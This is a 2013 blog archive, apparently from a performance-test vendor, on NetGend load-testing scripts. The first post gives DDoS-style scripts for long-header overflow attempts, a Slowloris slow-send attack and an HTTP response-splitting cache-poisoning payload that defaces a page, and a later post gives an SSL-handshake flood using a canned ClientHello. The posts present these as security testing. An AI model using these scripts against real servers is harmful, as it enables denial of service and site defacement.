Scalable, Flexible Performance Testing : 2013

Monday, December 30, 2013

A performance test platform as Low Orbit Ion Cannon

Networking security has gained a lot of attentions over the years and has become one of the top reasons that keeps a web site owner awake at night. In this blog, we are going to talk about how the NetGend, a performance test platform, can help with security testing.

By nature, any powerful performance test platform can be turned into a DDoS testing platform. NetGend platform with its ability to emulate 50,000 concurrent virtual clients on one box is not an exception. Compared to the famous DDoS tool LOIC (Low Orbit Ion Canon, a cool name!), NetGend can support more concurrent sessions, more realistic emulation of clients.

On NetGend platform, emulation of sophisticated clients is done by using a javascript like script. Unlike LOIC which can send simple messages, NetGend can send dynamic messages with lots of moving parts (i.e variations in the messages) and on top of it, it can engage with the victim server through complex interactions as good clients. It can really cause some pain on web servers for DDoS testing.

First let's try to cause buffer overflow with a long HTTP header. In the following script, we use built-in function "repeat" to create a "Referer" header that's is 20,000 bytes long:

 function VUSER() { 
      httpHeader.Referer = repeat("A", 20000);  
      action(http, "http://www.example.com");  
 }

Similarly, you can add more long HTTP header such as "XYZ":

    httpHeader.XYZ = repeat("A", 30000);

Creating HTTP requests with long headers is quite easy. Let's look at the Slowris attack, which has become a popular attack against servers. Here an attacker causes DoS on a web server by sending HTTP requests very slowly, exhausting all resources (connections) on the server. Original script is quite long. Here we can do a simpler version in a few short lines:

 function VUSER() { 
      connect("www.example.com", 80); 
      http.POSTData = "name=jin&pass=123";  
      a = createHttpRequest("http://www.example.com/");  
      for (i = 0; i < length(a); i ++ ) {  
           send(substr(a, i, 1));  
           sleep(5000);  
      }  
 }

In the above script, we create a connection to the web server and then create a valid HTTP POST request and send it one character at a time and wait for 5 seconds between sending each character. By spawning many VUsers (up to 50,000), we will chew up all the connection resources on a server.

The above two examples are quite simple in concept, to conclude our blog, let's look at an example where lots of creativity was involved in crafting a special HTTP request with malicious intention. Kudos to the researcher(s) who found it. This attack is called "HTTP cache poisoning" and is documented here.

This is an attack on the http cache server. The following diagram from a blog by Bertrant Baquet shows the position of a HTTP cache server. In the normal operation, when a HTTP cache server receives a request, it will search for the cached transactions, if found one, it will send the response from the cache, otherwise, it will forward it on to the web server and then send the response from the web server back to the client side.

The idea of the attack is to send one request from the client and make the server's response appear to be two responses from the cache server's point of view. This attack will work, for example, when the web server has a dynamic page that will redirect based on the incoming URL. For example, when the incoming request is the following
http://www.example.com/redirect?page=http://www.test.com
it will send a 302 response with the "Location" header being "http://www.test.com". By cleverly crafting a message in place of the highlighted part, the attacker (on client side) can control what the server sends.

In the following script, the specially crafted message (called "poison") is in bold, we use the function "toUrl()" will escape it so it can be included as part of the URL.

 function VUSER() {  
      connect("www.example.com", 80);
      httpHeader.Pragma = "no-cache";
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg); //turn off cache
      poison = "
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2015 14:50:18 GMT
Content-Length: 21
Content-Type: text/html

<html>defaced!</html>";
      poison = toUrl(poison);
      msg = createHttpRequest("http://www.example.com/redir.php?page=${poison}");
      send(msg); //add the poison
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg);
}

As a result, the HTTP cache server will put <html>defaced!</html> as the cached response for the home page!

From a web server owner's point of view, both security and performance are important, isn't it nice to have one platform that can test both?

Friday, December 27, 2013

How to resume an interrupted performance test

Recently I read an interesting blog on "Handling consumable parameter data in LoadRunner" by Stu, a veteran on performance test. Even though it's about loadrunner, the underlying problem itself is applicable to all performance test platforms.

The problem may come naturally when you run performance tests. Think about this scenario: you have a csv file with 100,000 users and you need to register these users. Half way through, there is a problem or you need to leave, so the test has to be stopped. When you come back to continue with the test, you need to resume from where you left. You can make a note (or a mental note) where the test stopped, but it's cumbersome, especially when you have to start and stop test multiple times.

Stu's blog gave multiple creative solutions, however, none of them are quite simple due to the design limitation of Loadrunner. On NetGend, we have the concept of "permanent" variable and it solves the problem nicely. A variable is "permanent" if the value of the variable is stored in a permanent place (like in a file). So even after the test program was stopped, the value of the variable is still there, when you run the test again, the "permanent" variable will continue with the value left from the previous run.

Permanent variables can be created with "createPermVar()" function. It takes two parameters, the first one is the name of the permanent variable, the second parameter is the name of the file to store the value of the permanent variable.

 createPermVar( <variableName>, <fileName>);

Here is a simple example that shows how to use it. The file "users.csv" contains rows of usernames and passwords.

 function userInit() {  
      createPermVar(index, "perm.txt");  
      var allUsers = fromCSV("users.csv");  
 }  
 function VUSER() {  
      x = getNext(allUsers, index);  //x[0] is username, x[1] is password
      index ++;  
      http.POSTData = "username=${x[0]}&password=${x[1]}";  
      action(http, "http://www.example.com/register");  
 }

In the above script, the variable "index" is a permanent variable, whenever its value changes (as by index ++), it will be implicitly stored in a file.

If the file (in this case "perm.txt") doesn't exist, the permanent variable ("index" in this case) will have initial value of 0 (when used as an index, it refers to the first element in an array) and the file will be created.

You may be concerned with the impact on performance due to storing value to a file - we all know writing to a file can be slow, especially on the disk seeking. Rest assured, storing values in our case is actually very fast! Our performance evaluation on this operation shows that we can achieve 2,000,000 operations per second on a slow PC.

Now you see how the "permanent" variable works. Does your favorite test platform have this feature?

Wednesday, December 25, 2013

Random element in an array

In performance testing, we sometimes need to deal with a list of values. For example, when we test an e-commerce web site, we may need to extract a list of products from a page. With the list/array extracted, we can do operations such as randomly picking an item to view or to add to cart. On some platform, this logically simple operation can be a daunting job.

Saw an interesting blog by Howard Clark on testing Peoplesoft Financials 9.0 using loadrunner: "Randomly Selecting an Array of Values and Using That Value As A Parameter". Here is the script to pick a random BUID copied from that blog. It's listed here just to show how complex it is - you don't have to read it.

 int TotalNumberOfBUIDs;  
 char TotalNumberOfBUIDschar[3]; //working variable  
 char *AvailableBUIDsparam; //working variable  
 web_reg_save_param(“AvailableBUIDs”,  
 “LB/IC=class=’PSSRCHRESULTSODDROW’ >”,  
 “RB/IC=”,  
 “Ord=All”,  
 “Search=Body”,  
 “RelFrameId=1″,  
 “Notfound=error”,  
 LAST);  
 TotalNumberOfBUIDs=atoi(lr_eval_string(“{AvailableBUIDs_count}”));  
 TotalNumberOfBUIDs = rand() %TotalNumberOfBUIDs;  
 lr_output_message(“%d”, TotalNumberOfBUIDs);  
 itoa(TotalNumberOfBUIDs, TotalNumberOfBUIDschar, 10); //working variable conversion  
 lr_save_string(TotalNumberOfBUIDschar, “BUIDindex”);  
 AvailableBUIDsparam = lr_eval_string(“{AvailableBUIDs_{BUIDindex}}”);  
 lr_save_string(AvailableBUIDsparam, “BUIDs”);  
 lr_save_string((lr_eval_string(lr_eval_string(“{BUIDs}”))), “BUID”);  
 “Name=VCHR_ERRC_WRK_BUSINESS_UNIT”, “Value={BUID}”, ENDITEM, //application of the value that was captured and then randomized

While I was impressed by the author's skills in C, I couldn't help wondering how an average test engineer can do this. They know their test subject well, but writing such complex C program can be well above their heads. On Netgend platform, it's so much easier.

 AvailableBUIDs = substring(str, "class=’PSSRCHRESULTSODDROW’ >", "<", "all");  
 TotalNumberOfBUIDs = length(AvailableBUIDs);
 BUIDindex = randNumber(0, TotalNumberOfBUIDs-1); //indexing is 0 based  
 BUID = AvailableBUIDs[BUIDindex];  //variable "BUID" now contains a random value.

Even though we tried to use the same variable names as in loadrunner script, our script is still much shorter and easier to understand. Here are some of the reasons for the simplicity:

In a NetGend script, all variables are local to an instance/Vuser. There is no need to use API to get the value of a variable (called "parameter" in Loadrunner) into code space or write the value back to the variable after some operations in the code space.
NetGend supports the array variable. In this case, the variable "AvailableBUIDs" holds the array of extracted BUIDs.
You can get the length of the array by the function "length()".
You can get any element in the array by indexing using []. For example: AvailableBUIDs[BUIDindex] gives the value of "BUIDindex+1"th element. (it's 0 based)

Note that the above short script (4 lines) can be made even shorter. The readability may suffer a little bit but it's still fairly easy to understand.

 AvailableBUIDs = substring(str, "class=’PSSRCHRESULTSODDROW’ >", "<", "all");  
 BUID = AvailableBUIDs[randNumber(0,length(AvailableBUIDs)-1)];

A good performance test platform needs to make complex test scenarios simple, not the other way around.

Monday, December 23, 2013

Performance testing in the ocean

Vacation by cruise ship is pleasant. You got to see beautiful places, eat great food and experience fun events -- all for a low price. I am not working for a cruise line but I love taking cruise so much that I can't help speaking like one :-) Cruise is not without its problems, one of them is, internet access. We are not talking about checking internet every hour or every minute for news, emails etc. After all, you are on the cruise ship for fun. Many guests do need to share their pictures, stories with their friends and stay connected.

So what's the issue with internet access on a cruise ship? It's slow and expensive - some goes like $0.75/min. Internet access in the land goes through cable, DSL or wireless links, but on a cruise ship it will have to go through the satellite link, that's the fundamental reason why it's slow and yet expensive. I can understand this. But I can't understand why the login process is so slow - it can take dozens of seconds. The servers needed for login process are all on the ship, the information needed is simple - just username and password. So my guess is that the server software is not thoroughly tested for their performance.

If you are wondering whether there is a need to do performance testing on a cruise ship, consider the following facts:

There are close to 4000 guests on ship, many with smartphones, tablet PCs or laptops,
Many probably will try internet access between two events (for example, the time between two shows),
users have to log in and log off multiple times - login to check out some emails, go offline to avoid the high per-minute charge, compose responses and log back in to send them.

I took a quick look at how I would performance-test it. The login process itself is pretty simple - just sending the following HTTP POST data to the server (UserID and Password changed for anomity).

 //the following are the HTTP POST data sent to server during login
 FRM_VERB:FRM_VERB_LOGIN  
 hdnPageName:WIRELESS_LOGIN  
 UserID:jsmith  
 Pass:abc123  
 Image1.x:18  
 Image1.y:30

Note that there are 4 hidden fields in the form.

If I were testing it using NetGend platform, I could use the following script to test it out. In a nutshell, here is what the script does:

In userInit() part, it preloads a csv files, each of its rows contains a username and password.
In VUSER() part, it will get the login page. Then it will "fill" the form with a pair of username and password read from the csv file and do the "login".
Finally it will logout.

 function userInit() {  
      var db = fromCSVFile("users.txt");  
      var index = 0;  
 }  
 function VUSER() {  
      action(http,"http://10.10.10.10/login.asp");  
      a = db[index];  
      index ++;  
      info.UserID = a[0];  
      info.Pass = a[1];  
      http.POSTData = fillHtmlForm(http.replyBody, info);  
      action(http,"http://10.10.10.10/login.asp"); 
      x = randNumber(30000, 600000); //sleep randomly from 30 to 600 seconds (10min)
      sleep(x);
      action(http,"http://10.10.10.10/logoff.asp");
 }

Observant readers may find that it doesn't deal with the "hidden" fields when it sends the HTTP POST data for login. That's because the function "fillHtmlForm()" will take care of hidden parameters so users don't have to set up complex regular expression (or something equivalent) to capture the hidden parameters and put it back in the HTTP POST Data.

The need for performance testing is everywhere, you just can't escape it - even in the middle of the ocean.

Saturday, December 14, 2013

Fun with Performance test platform

In previous blogs, we showed that the NetGend application performance test platform can be used for business - web service performance testing. This blog covers a story about using it to do something fun.

It started with my upcoming cruise vacation. I planed to bring my running shoes and go to gym every afternoon - how else can deal with so much good food? I used to listen to the NPR radio station while running, but in the middle of the ocean, there would be no radio nor high speed internet, my only choice would be podcasts. My favorite is the Market Place from APM.

Searched the APM web site but didn't find the list of podcasts - the best I could find was the podcast for yesterday. Eventually Google brought me to this page in the apple itune store. It seemed promising.

Unfortunately I didn't have iTune installed on my Ubuntu PC and didn't intend to do it only to download these podcasts for my cruise vacation. While being a little disappointed, I noticed that the HTML page had something that looked like URLs for the podcasts (see the highlighted parts in the following). I copied and pasted one of the values to my browser's address bar, yes, that was exactly what I had been looking for!

 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/bFRhvGqQpxg/marketplace_podcast_20131211_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-11-13 Marketplace - Certainty?" adam-id="209223815" row-number="0" class="podcast-episode">  
 ....  
 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/o6MbaCEnmbU/marketplace_segment24_20131210_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-10-13 Marketplace - Volcker? He rules!" adam-id="207293711" row-number="1" class="podcast-episode">  
 //more than 20 of them

To grab all the values of this attribute, we needed to use a XPath like //tr/@audio-preview-url. Luckily it's supported by NetGend. So I wrote a simple script to get all the URLs for the podcasts. Downloading a podcast and writing it to disk is pretty simple.

 function VUSER() {   
      action(http, "https://itunes.apple.com/us/podcast/apm-marketplace/id201853034");  
      a = fromHtml(http.replyBody, '//tr/@audio-preview-url');  
      for (i = 0; i < getSize(a); i ++) {  
           if (match(a[i], /\/([^\/]+)$/)) {  //extract the file name from URL
                fName = g1; 
                println("downloading ${a[i]}");  
                fileName = g1;  
                action(http, a[0]);  //download the URL
                writeFile(fileName, http.replyBody);  
           }  
      }  
 }

Running this gave me the podcasts which I then transferred to my smartphone. I was filled with joy - on the one hand, I got the podcasts I need, on the other hand, I realized that this test platform can also be used for something other than testing! I know it's possible that there are other tools that can do the above, but can you image a performance test platform is able to do it so easily?

Thursday, December 12, 2013

How bad is a security threat?

Recently I met my friend Percy, who is a technical guru I respect. Our talk inevitably moved on to something technical on SSL - how many SSL handshakes can a server support. He sent me an interesting security threat report of DDoS on HTTPS servers.

This report indicates that HTTPS servers may suffer from the SSL re-negoation attacks thanks to the THC tool. Even if the re-negotiation is turned off, the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol. So it remains an attack vector.

To get an idea on how bad the server CPU exhaustion can be, I started wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake process. SSL handshake involves multiple steps, first step is that client side sends a client-hello message to the server side. According to the wireshark, just replying to a client-hello message causes server to do 5ms' worth of intensive computation (my server has an AMD quad-core CPU: Athlon II X4 645, 3.1 GHz).

Our NetGend platform can setup tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side and yet cause the server to be busy. Some SSL handshaking steps may still cause the client side to do some nontrivial computations, so it's better to send a canned client-hello message which causes the client almost no computing time.

First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".

 16 03 01 00 cc 01 00 00 c8 03 01 52 a2 93   
 34 0b 60 fd c9 59 ba 0c 8a 38 cc c7 b4 96 fa 50   
 09 cc 46 f2 40 2b e1 12 e7 99 3e 98 25 00 00 5a   
 c0 14 c0 0a 00 39 00 38 00 88 00 87 c0 0f c0 05   
 00 35 00 84 c0 12 c0 08 00 16 00 13 c0 0d c0 03   
 00 0a c0 13 c0 09 00 33 00 32 00 9a 00 99 00 45   
 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07   
 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14   
 00 11 00 08 00 06 00 03 00 ff 02 01 00 00 44 00   
 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 01 00   
 02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00   
 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00   
 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00   
 23 00 00

Then we create the following script to run on the NetGend platform.

 function userInit() {  
      var data = readFile("clientHello.txt");  
      data = fromHexString(data);  //this will convert hex bytes to binary data
 }  
 function VUSER() {  
      connect("10.3.0.3", 443);  
      send(data);  
      recv(msg);  
      //close() is unnecessary, the connection will be closed at the end of VUser.
 }

The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz) but when it sends the client-hello messages at a rate about 2900/second (over multiple connections), the server side is almost completely busy (see the highlighted CPU idle percentage).

 Tasks: 265 total,  2 running, 260 sleeping,  0 stopped,  3 zombie  
 Cpu(s): 81.8%us, 15.0%sy, 0.0%ni, 0.3%id, 0.0%wa, 0.0%hi, 2.8%si, 0.0%st  
 Mem: 16177816k total, 14040884k used, 2136932k free,  524640k buffers  
 Swap: 3929084k total,    0k used, 3929084k free, 9915940k cached  
  PID USER   PR NI VIRT RES SHR S %CPU %MEM  TIME+ COMMAND                     
 18152 www-data 20  0 1961m 4008 1248 S  61 0.0  6:28.21 /usr/sbin/apache2 -k start            
 18462 www-data 20  0 1961m 4012 1248 S  61 0.0  0:41.27 /usr/sbin/apache2 -k start            
 18578 www-data 20  0 1961m 3984 1136 S  60 0.0  0:06.15 /usr/sbin/apache2 -k start            
 18151 www-data 20  0 1961m 4008 1248 S  59 0.0  6:26.73 /usr/sbin/apache2 -k start            
 18354 www-data 20  0 1961m 4644 1592 S  59 0.0  4:10.70 /usr/sbin/apache2 -k start            
 18490 www-data 20  0 1961m 3964 1104 S  59 0.0  0:40.16 /usr/sbin/apache2 -k start     
 17227 admin    20   0 3470m 2.2g 2.2g S   32 14.1  18:15.93 /usr/lib/vmware/bin/vmware-vmx -ssnapshot.num

The VM process used to take 10% CPU on one core, it takes much more now due to the CPU resource contention. While I can still use real browser to access HTTPS pages, it's clear that the server is VERY busy.

So, it's good to be aware of a possible security threat, it's even better to get some idea on how bad it can be - the peace of mind matters. NetGend can give you that peace of mind.

Tuesday, December 10, 2013

Performance testing on REST API

RESTful API has great promises in simplifying the development on web/smartphone apps and handling a larger number of clients. How can we effectively test servers that support RESTful APIs?

To load-test RESTful service, we need to be able to generate HTTP requests with methods like "PUT", "DELETE" etc. You are right, they may not be the familiar ones like GET, POST, but on NetGend platform, it's easy to emulate just about any HTTP method:

 http.method = "PUT";  
 //or  
 http.method = "DELETE".

Note that by default, the http method is "GET" on NetGend platform, if you need HTTP POST method, you can simply do it by

 http.method = "POST";  
 //or just specify there is http POST data.  
 http.POSTData = "name=john&city=houston";

When you generate HTTP Body in JSON format (say for HTTP Post message), you can either use a template or use the function combineHttpParam.

 http.POSTData = q|{ "name": "john", "city": "Houston", "age": "23"}|;  
 //or  
 person.name = "john";  
 person.city  = "Houston";  
 person.age  = 23;  
 http.POSTData = combineHttpParam(person);

Did you notice that the you don't have to escape the double-quotes in the template? On the other test platforms you may have to write { \"name\": \"john\", \"city\": \"Houston\", \"age\": \"23\"} ? If you think escaping is a pain, you are not alone! Now you understand why I think it's a pleasure to do it on the NetGend platform.

The URL path for RESTful request may look like the following:
/rest/8af909ffefa9/getDiston.json/10001/20002/mile, it can be generated in two ways.

 //method 1, by variable substitution 
 /rest/${apiKey}/getDiston.json/${zip1}/${zip2}/${unit}  
 //assume you have the variables defined

 //method 2, by join an array
 a[0] = apiKey;  
 a[1] = "getDistance.json";  
 a[2] = zip1;  
 a[3] = zip2;  
 a[4] = "mile"; //can have other unit  
 apiMsg = join(a, "/");  
 action(http, "http://www.example.com/rest/${apiMsg}");

HTTP responses for RESTful are increasingly in JSON format. Parsing JSON message is pretty simple on NetGend platform and has been covered many times in the previous blogs. The following is an example of JSON message from a site that implements a "todo" list.

 [ {"id": 1,  
     "text": "reserve lunch"  
    }, {"id": 2,  
     "text": "fix mower"  
    }, {"id": 3,  
     "text": "buy grocery"  
    }]

Let's put all these together and try to test the RESTful site for "todo" list by implementing the following sequence.

Get a list of existing "todos"
randomly delete one of them
add a new one
update a random "todo"

 action(http, "http://www.example.com/todos/"); 

 //delete a random one 
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{"id": ${id}}|;  
 http.method = "DELETE";  
 action(http, "http://www.example.com/todos");  

 //add a new one  
 http.POSTData = q|{"text": "talk to insurance agent"}|;  
 action(http, "http://www.example.com/todos");  

 //update
 action(http, "http://www.example.com/todos/");  
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{ "text": "updated content!", "id": ${id}}|;  
 http.method = "PUT";  
 action(http, "http://www.example.com/todos");

There are obviously more test scenarios, I am sure they will feel just as pleasant like this one!

Sunday, December 8, 2013

goto considered helpful (in some cases)!

There are occasional debates on whether it's good to have "goto" statements in a program or even in a programming language. The typical argument by a proponent is a little weak: "goto" can help jumping out of a nested loop. As far as I can see, the proponents are typically on the losing side. Sadly, I am one of them. In this blog, we are going to present a better argument using "goto" can be natural for certain audience in some cases.

Some developers may argue that we can use "if", "while" etc to accomplish what "goto" statements can do. Yes, that's true, but it doesn't feel natural and easy for our audience: those without a lot of programming background. "goto" (or jump) feels more familiar for them.

On Netgend test platform, we use javascript syntax. It may appear that it's impossible to support "goto" since javascript language itself doesn't support it. We came up with the following way around it. To set a label, you can call a function "setLabel(<labelName>)", to jump to a label, you can call "goto(<labelName>)".

Here is a simple example to illustrate how it is used.

  function VUSER() { 
      id = 2; 
      println("start");  
      setLabel("test1");  // <--- set the label here
      println("hello"); 
      id --; 
      if (id > 0) {  
            goto("test1"); // <--- jump to label
      }  
      println("world");
 }

In this example, the println("hello"); statement will be executed twice (the second time is due to the "goto" statement), the output is

 start  
 hello  
 hello  
 world

Now let's look at an example that's a little more realistic: we need to emulate sensors trying to register with a master. Master node may ask a sensor node to wait a little bit and try again.

 function VUSER() {
       connect("1.1.1.1", 12345);  
       setLabel("register");  
       send("register by ${userId}");  
       recv(response);  
       if (match(response, /please wait (\d+) ms/) {  
          sleep(g1);  
          goto("register");  
       }  
       //now send data to master 
}

It's true that the above logic can be done with a while loop, but it's much easier for a test engineer to understand the logic if we use "goto" here.

Finally as a simple, real world example, we need to emulate a user who visits an e-commerce site, with the following distribution:

70% probability, the user will just browse the product
20% probability, the user will exit the site.
10% probability, the user will register and continue to browse product

 function VUSER() {
       action(http, "http://www.example.com");  
       isRegistered = 0;  
       browsePercentage = 70;
       exitPercentage = 20;
       registerPercentage = 10;

       setLabel("userAction");  //<--- let the fun start
       if (isRegistered == 0) {  
            choice = rolldice([browsePercentage, exitPercentage, registerPercentage]);  
       } else if (isRegistered == 1) {  
            choice = rolldice([browsePercentage, exitPercentage]);  
       }  
       if (choice == 0) { //browse product
            //pick a product and view it  
       } else if (choice == 1) { //exit site  
            return 1;  
       } else { //register  
            //register actions
            isRegistered = 1;  
            browsePercentage += registerPercentage;  
        }  
       goto("userAction");  
}

The rolldice() function above will pick a choice (it's 0 based) according to the percentages. Based on the value of choice, we perform one of the 3 actions and go back to "userAction" to decide what to next.

Human mind is wired to understand "goto" faster, let's keep it that way for performance testing.

Friday, December 6, 2013

Performance testing on an online library

Recently we tested an online library. This library serves many technical documents, each document is in the form of a book. Users can search and read the books all from his/her browser. We need to find the capacity of this library, defined as the number of users that can use this library concurrently and still have positive experience.

The development team had gone out of their way to make the user experience as pleasant as possible, for example, when a user flips a page, it will load immediately, why? the system will try to pre-load the next page while the user is reading the current page. Assume a user spends an average of 20 seconds reading a page, we want to find out how many users can the library serve while most of page loading times are still within 20 seconds.

In summary, here is a simple test scenario:

user login to the library
pick a book
go to a random page in the book and read all the way to the last page.

The login step is relatively simple and so is the step on getting a list of books. The hard part is to emulating a user flipping through the pages. The web page representing a book contains a flash application. According to the developer tool, when user flips to the next page, the flash application will send a HTTP request like the following:

 .../<bookId>/<prefix><pageNumber>.swf

It's easy to find the list of book IDs. However, it's not quite easy to find the following

"prefix" (it varies with the bookId)
max pages of the book - used to generate a random page in the book

Luckily, the following blob of text in the HTML page of the book has the information we need (see the bold text).

 function(){setPreviewSource('/123456789/410/{ef[*,0].swf,96}&DownloadEnabled=false&PrintEnabled=false&PrintOnePageEnabled=false','/bitstream/123456789/410/3/ef.js','/bitstream/123456789/410/2/6515695376

With this observation, we can easily write a script to extract those fields

URL Path (green part),
prefix (the yellow part)
max number of pages (pink part).

We are going to use regular expression setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/ to do the extraction.

 //script A
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = "jsmith@example.com";   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      for (id = 1; id < 500; id ++) {  
           action(http, "http://www.example.com/handle/123456789/${id}");  
           if (match(http.replyBody, /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/) {  
                println("${g1},${g2},${g3}");  
           }  
      }  
      action(http,"http://www.example.com/logout");   
 }

Note that the three variables g1, g2, g3 represent the 3 fields extracted by the regular expression. We run it with 1 Vuser and collect the outputs of "println" to produce a csv file (say, "books.csv") which we will use in the next step. The csv file looks like:

 ...  
 /123456789/410,ef,96  
 ....

On a side note, this shows that our platform can not only be used for performance testing, it potentially can be used to build handy tools :-)

Now we are going to use the csv file in the implementation of the test scenario,

  //script B
 function userInit() {  
      var db = fromCSV("books.csv");  
 }  
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = toUrl("jsmith@example.com");   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      a = getNext(db);  

      for(num = randNumber(1, a[2]); num <= a[2]; num ++ ) {
           action(http,"http://www.example.com/handle/${a[0]}${a[1]}${num}.swf");  
           if (http.totalRespTime > 20000) {  
                print("${http.totalRespTime},${http.url}");  
           }
      }
 }

Here the function call getNext(db) will grab the next row in the csv file, each row consists of 3 elements: URL_path, prefix and max_pages. Denoted by a[0], a[1], a[2] respectively. So randNumber(1, a[2]) simply means a random page in this book.
We ran the script B multiple times, each time with a different number of VUsers and found the number of Vuser when the response times are still acceptable. The development team are quite happy at how simple the scripts are. They have tried JMeter, which was not as flexible.

Development of an online library can be challenging, performance testing on the library doesn't have to be, what do you think?

Tuesday, December 3, 2013

Use caution when migrating to the cloud

Cloud platform has become increasingly popular thanks to its better sharing of hardware resources. More and more services are being migrated to it. However, along with the benefits, it carries some concerns on performance that we are going to look at in this blog.

Recently I did a performance test against an online library. We need to login to the site and pick a book and emulate user browsing through pages of the book.

It's fairly easy to develop script on NetGend platform (URLs and names are obscured to keep the site anonymous)

 function VUSER() {  
      action(http,"http://www.example.com"); //this step will get a sessionID in cookie  
      a.login_email = toUrl("jsmith@example.com");  
      a.login_password = "abc123";  
      http.POSTData = combineHttpParam(a);  
      action(http,"http://www.example.com/password-login");  

      for (id = 1; id < 340; id ++) {  
           action(http,"http://www.example.com/1234567/19/11h${id}.swf");  
           println("${id},${http.totalRespTime},${http.url}");  
      }  
 }

To my surprise, the response times (defined as the time between the transmission of HTTP request and the last packet of HTTP response) vary from 234ms to 1911ms. Since the HTTP response sizes for these transactions are about the same, I wonder what caused the variation in response times.

Luckily I have a friend called "wireshark", the world's most famous packet sniffer. According to the packet capture shown on wireshark, there is a range of packets with long delays among them. There are no dropped packets (hence no packet re-transmissions) here, so there are two possibilities left:

Delay was caused by the server.
Delay was caused by the network elements (like routers) along the path between the server and my PC.

At this point, it appears impossible to determine which one is the real cause. Thanks to the TCP timestamp option (which is turned on by default), it's possible to determine where the delay happened. Why? because the timestamp in TCP option (last part TCP header, if present) was set by the server when a TCP packet was sent. By looking at the variation on TCP timestamp , we can infer whether the delay is caused by the server or the network.

Here is what I gathered from the wireshark packet capture:

 1 0.000000000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 2 0.000375000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 3 0.000500000 192.168.5.105 38922 1.1.1.1 80 TSval 66747395  
 4 0.000675000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 5 0.035894000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383936  
 6 0.035929000 192.168.5.105 38922 1.1.1.1 80 TSval 66747404  
 7 0.188478000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 8 0.188825000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 9 0.188856000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 10 0.189142000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 11 0.189454000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 12 0.189479000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 13 0.189764000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974

The second column is the sniffer timestamp (when the packets are captured by sniffer), the last column is the TCP timestamp. One challenge here is to find how much time one unit of timestamp is equivalent to.

Let's take a look at 3 packets whose TCP timestamp changed (see the numbers in bold):

between packets 4 and 5, there is a difference of 9 (from 1483383927 to 1483383936) and the difference in timestamp is about 36ms (more precisely 35.2ms). On unit of time is roughly 4ms
between packets 5 and 7, there is a difference of 38 (from 1483383936 to 1483383974) and the difference in timestamp is about 153ms, again, one unit of time is roughly 4ms.

So based on packets 4, 5 and 7, we can conclude TCP timestamp changes match with the those of sniffer timestamp for these packets, which indicates that network didn't delay the packets, the big delays between the packets are caused the server.

Later on, it was confirmed that the server was running on a cloud based platform, possibly sharing a hardware with some noisy/busy neighbors. While 153ms of unexpected delay may not be much, but it can accumulate and not all applications can tolerate it. Now you know sharing the hardware can be double-edged sword, you are warned on your road to the cloud :-)

Monday, December 2, 2013

Performance testing on ftp servers

FTP servers used to be very popular in the 90's, they are still in use nowadays, but mainly to serve large contents, especially software packages. Browsers support them by default so you may not even notice it when you trigger a ftp transaction by clicking a link. In this blog, we will cover performance testing on ftp servers.

NetGend platform supports all the ftp transactions: ls, get and put ....

First, let's look at an example on uploading a file to a server. Suppose we need to upload a local file "users.csv" to a remote file "tmp.txt" in the directory of "www/test". Here is the simple script.

 function VUSER() {  
      connect("ftp.example.com", 21);  
      action(ftp, login, "jsmith", "abc123");  
      action(ftp, op, "cd", "www/test");   
      action(ftp, op, "pwd");  
      ftp.data = readFile("users.csv");  
      action(ftp, op, "put", "tmp.txt");  
 }

Pretty obvious, isn't it? Note that in the above script, the variable "ftp.data" holds the data to be sent to ftp server. You can dynamically generate the data if you want.

The operations "ls" and "get" are even simpler:

 action(ftp, op, "ls");   
 //ftp.recvedData will hold the output of "ls".

 action(ftp, op, "get", "tmp.txt");   
 //ftp.recvedData will hold the output of content of remote file "tmp.txt"

What's interesting here is, after the operation, the variable "ftp.recvedData" will hold the output of the operation. In the case of the "ls" operation, it's the directory listing, in the case of the "get" operation, it's the content of the downloaded file. You can do all the operations on this variable, such as, use regexp to grab certain fields and use them in the next ftp operations.

Of course, the following operations are supported. They are fairly straight forward.

action(ftp, op, "del", "temp.txt");

